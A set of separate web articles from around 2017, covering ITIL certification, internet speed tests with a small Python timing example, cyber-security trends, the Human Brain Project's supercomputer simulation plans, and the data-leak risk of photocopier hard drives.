It’s been said that, “A fool with a tool is still a fool.” Without proper processes, an IT department can buy high-end computing infrastructure and systems, and still fail to help the business meet its objectives. They fail because of a lack of understanding of outcomes and needs, or simply by not working together to deliver proper services.
ITIL solves these problems by enabling certified professionals and departments to see and understand IT needs and requirements from an organizational and customer perspective. | <urn:uuid:84cb86f5-6a1e-4bf5-bfbc-d7bfda1291c6> | CC-MAIN-2017-04 | http://certmag.com/basics-of-itil-why-itil-certification-taking-over-the-world/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281426.63/warc/CC-MAIN-20170116095121-00223-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.937095 | 1,954 | 2.78125 | 3 |
What is the speed of your connection?
What is "download speed" and "upload speed"?
The download speed is how fast you can pull data from the server to you. Most connections are designed to download much faster than they upload, since the majority of on-line activity, like loading web pages or streaming videos, consists of downloads. Download speed is measured in megabits per second (Mbps).
The upload speed is how fast you send data from you to others. Uploading is necessary for sending big files via email, or in using video-chat to talk to someone else on-line (since you have to send your video feed to them). Upload speed is measured in megabits per second (Mbps). | <urn:uuid:756507a5-3e23-466e-9d44-07251a36f40b> | CC-MAIN-2017-04 | http://globalit.com/speed-test | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560285315.77/warc/CC-MAIN-20170116095125-00039-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.965526 | 148 | 2.953125 | 3 |
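As a rough illustration, download speed in Mbps can be estimated by timing a transfer and converting bytes to megabits. The URL below is a placeholder, and a single connection only gives a crude estimate compared with a proper multi-connection speed test.

import time
import urllib.request

def download_mbps(url):
    # Time one transfer and convert bytes/second to megabits/second.
    start = time.monotonic()
    with urllib.request.urlopen(url) as resp:
        nbytes = len(resp.read())
    elapsed = time.monotonic() - start
    return (nbytes * 8) / 1_000_000 / elapsed

# Placeholder URL; use a large, nearby test file for a meaningful figure.
print(round(download_mbps("https://example.com/testfile.bin"), 1), "Mbps")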
The need to build or rebuild trust, ideological shifts pointing towards cyber war, technology touching all parts of our lives, cultural shifts spawning cyber activism, digital natives and the democratisation of technology in favour of less developed nations. These are all factors that are driving change and that will shape the future cyber environment. We are all now living in a cyber era and things are getting more and more unpredictable. So says Jarno Limnéll, director of cyber security for Intel and a doctor of military science. And I must say that I agree with him.
Here is what we have got in store for us:
Who on earth—and what—can we trust these days?
Stealthy, targeted attacks; reliance on the cloud; virtual money; big data gathering; mass surveillance; the mobile revolution. Technology has changed dramatically. It is now all-pervasive, part and parcel of every aspect of our lives.
We place a great deal of information about ourselves online, but that is a bonus for attackers preparing targeted attacks. We cannot trust that that information will not be used against us. Recent revelations about widespread surveillance means that we cannot really trust that our communications are not being intercepted. Data placed in the cloud can be subpoenaed without our knowledge. There has been talk of creating a European internet to ensure privacy concerns are guarded, which goes against its global nature and the principles on which it was founded.
Trust is the very cornerstone of society—and of business. We need to build safeguards that ensure that information is secure and privacy is respected in order to rebuild the trust that is being eroded. Security needs to be balanced with privacy.
With nation states increasingly being seen as adversaries in the cyber arena, is it inevitable that future wars will be fought with cyber weapons? For many, this would seem to be a low-cost, low-casualty option. Countries in Europe are known to be spending large sums to develop cyber warfare capabilities.
A recent article in the New York Times states that, although the US government has not spoken publicly about its capabilities or willingness to use such weapons, cyber weapons and special forces are two areas seeing growth in a recent budget released by the Pentagon. The first country to strike using such weapons could embolden other countries to do likewise. According to Limnéll, the growth in cyber weapons programmes is a very worrying trend and the only way to control the situation is by reaching an international agreement for cyber arms control.
Today’s always-on world represents a paradigm shift in security and privacy. For too long, technology has been developed first, and then security has been bolted on as it becomes evident that it is necessary. The internet is a prime example of this. It was developed with openness and inclusion in mind—but it has been shown to be manifestly insecure.
The same is true for a host of other technologies that pervade our everyday lives. Now, and into the future, we are envisaging the Internet of Things, where billions of devices become interconnected, accessible over networks. This will include devices such as medical equipment and systems. Researchers have already shown these to be hackable, presenting worrying scenarios regarding the safety of patients. If the promise of the Internet of Things is to become a reality, a rethink is required in terms of security. Instead of bolting it on as an afterthought, it must be built in from the outset.
According to urban legend, bank robber Willie Sutton robbed banks “because that’s where the money is.” Today, the number of physical bank robberies has declined dramatically. Instead, criminals have turned their attention to the internet and associated technology, because that is where the money flows today and it can make for easier pickings. Criminal gangs attacking online targets are forming into organisations with resources that could rival large multinationals.
But motivations go beyond money. Cyberactivism is growing all the time and is something we are going to have to learn to live with. Today’s young people—the so-called Generation Y—are growing up with cyber being part of everything they do. They know no other way. As technology becomes ever more pervasive, cyber security will become an increasingly personal issue. According to Limnéll, every one of us will have cyber rights and responsibilities, and these will impact every decision that we make.
According to the United Nations, there will be more Chinese-speaking users of the internet than English by as early as next year. It has also been reported that there are already more mobile phones in use in Africa than in the US and Europe combined. Regions previously seen as remote to those in the Western world will gain in significance, forcing businesses out of their own backyards in order to compete more effectively in fast-growing markets. Cyber security is coming to be more than just about high technology. It will see us having to make changes in the way we behave.
The world is changing and we need to adapt to new realities. At a strategic level, we need to adapt the way we develop policies and make industry and business decisions. At an operational level, we need to consider what kind of security procedures, processes and models we need. And at a technical level, we need to develop new ways of solving security problems technologically.
The cyber era is the new reality and we must evolve old ways of thinking if we are all to prosper. | <urn:uuid:c6b9a64f-c245-4282-9102-186d4ed3f526> | CC-MAIN-2017-04 | http://www.bloorresearch.com/blog/fran-howarth/a-brave-new-pretty-scary-world/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281492.97/warc/CC-MAIN-20170116095121-00067-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.963612 | 1,099 | 2.578125 | 3 |
Henry Markram, the man behind the Human Brain Project (HBP) wants to simulate all known information about the human brain. The project requires heavy investment and has been received with skepticism by some of Markram’s colleagues, but he seems determined that this project will help neuroscientists answer unsolved mysteries about the human brain.
Last week, Nature ran a feature story about Markram, outlining his pitch for HBP, whose goal is to simulate the human brain using a supercomputer. In fact, Markram wants to generate a multi-level simulation of the brain, or as he puts it, “from the genetic level, the molecular level, the neurons and synapses, how microcircuits are formed, macrocircuits, mesocircuits, brain areas — until we get to understand how to link these levels, all the way up to behavior and cognition”. Markram believes such an approach will integrate a lot of disparate research from the neuroscience community under a single model.
A simulation with this much complexity requires a huge amount of computing power, at least an exaflop, Markram believes. Although exascale machines are years away, he makes the argument that neuroscientists should nonetheless be preparing for this level of computing.
According to the Nature report, Markram’s project is competing for a $1.3 billion (€1 billion) pot of money from European Union that will be allocated to two ten-year Flagship initiatives. HBP is one of the six finalists still in the running.
Critics of the Human Brain Project express concerns about a loss of research diversity in the scientific community, and that the level of complexity in this effort could eventually lead to its downfall. Neuroscientists are already running simple models to help discover basic forms of behavior such as pattern recognition and posit that such a detailed model of the brain may end up being no easier to understand than an actual brain. Also, the price tag of the project likely means that funding for HBP would reduce investment in other areas of research.
Despite his detractors, Markram still believes the Human Brain Project is essential to understanding the unsolved mysteries of the brain. “If we don’t have an integrated view, we won’t understand these diseases,” he says in the Nature article.
If HBP fails to receive funding, Markram will continue with this research, albeit at a slower pace, under his “Blue Brain” project, which is the precursor to HBP. In either case, Markram believes that simulation of the brain will move forward, noting that simulation-based research is “an inevitability.”
A project with this much complexity and cost runs a number of risks, but it also has the potential to be a game changer in the field of neuroscience. While Markram’s critics may see the project as threatening to replace their research work, they make strong arguments about the need to maintain scientific diversity and the balanced use of funding.
Most people fail to realize that modern, multi-purpose photocopiers contain hard drives that – if not erased when decommissioned – could prove to be a treasure trove of confidential information for a person who knows how to extract it.
We shred hard copies of important documents and we securely wipe the disks on our computers, but rare is the instance when the same is done with the drive of the copy machine, because most people don't think of it as a computer – which it in fact is.
“The whole system is controlled by a computer, it has a hard disk. It scans images and they are stored on the disc,” says Graeme Hirst, a computer science professor with the University of Toronto.
That also means that a hacker that knows the password can hack into the photocopier and collect all the data stored on the drive by simply connecting a laptop to the machine and downloading it. Copy machines that are part of an insecure network can be accessed online even by people who don’t know how to hack.
But machines that are leased to companies and taken back after a few years can do some serious damage to their former “owners”. Sometimes they are destined for the dump, but they are also often serviced and sold to someone else. According to the Toronto Star, dealers who resell them usually wipe the disks, but some machines end up directly in the hands of the next user while still containing all the data.
To ensure that confidential data doesn't fall into the wrong hands, the hard drives ought to be physically removed and purged, or even replaced. Since that process is costly and slow, clearing the memory and changing the passcodes is also an option.
Lately, Xerox and some other manufacturers of photocopiers have made the process of removing the drive and secure wiping it a lot easier, but the main problem is the fact that most people don’t think about the ramifications of their everyday use of technology. | <urn:uuid:0d1e59c6-96db-4815-85cb-bf2bdd29cc8d> | CC-MAIN-2017-04 | https://www.helpnetsecurity.com/2010/03/29/office-photocopiers-brimming-with-corporate-secrets/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280239.54/warc/CC-MAIN-20170116095120-00123-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.967443 | 414 | 2.8125 | 3 |